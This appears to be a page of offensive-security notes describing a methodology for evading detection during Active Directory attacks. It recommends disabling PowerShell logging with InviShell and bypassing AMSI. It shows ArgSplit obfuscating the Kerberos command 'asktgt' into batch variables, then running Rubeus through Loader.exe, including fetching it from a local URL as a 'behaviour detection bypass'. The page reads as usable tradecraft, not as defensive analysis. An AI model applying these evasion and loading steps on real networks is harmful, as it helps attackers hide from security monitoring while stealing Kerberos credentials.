methodology

Powershell scripts

Use InviShell to disable PowerShell logging, has a built-in AMSI bypass.

Alternitavely use an AMSI bypass

If static detection is a problem, try obfuscating the tool.

Binaries

https://raw.githubusercontent.com/Raptoratack/ADTools/refs/heads/main/ArgSplit.bat https://github.com/Raptoratack/ADTools/blob/main/Loader.exe

Use ArgSplit to obfuscate the command argument, e.g: kerberoast, asktgt, etc... Copy and paste all the set :

[!] Argument Limit: 180 characters
[+] Enter a string: asktgt
set "z=t"
set "y=g"
set "x=t"
set "w=k"
set "v=s"
set "u=a"
set "Pwn=%u%%v%%w%%x%%y%%z%"

Check that the %Pwn% variable is what the want.

Use Loader.exe to load our binaries (Rubeus example):

Loader.exe -Path Rubeus.exe -args %Pwn% /stats /rc4opsec

Use Loader.exe with the behaviour detection bypass

Loader.exe -Path http://127.0.0.1:8080/Rubeus.exe -args %Pwn% /stats /rc4opsec

PreviousUtils Nextnotes

Last updated 1 month ago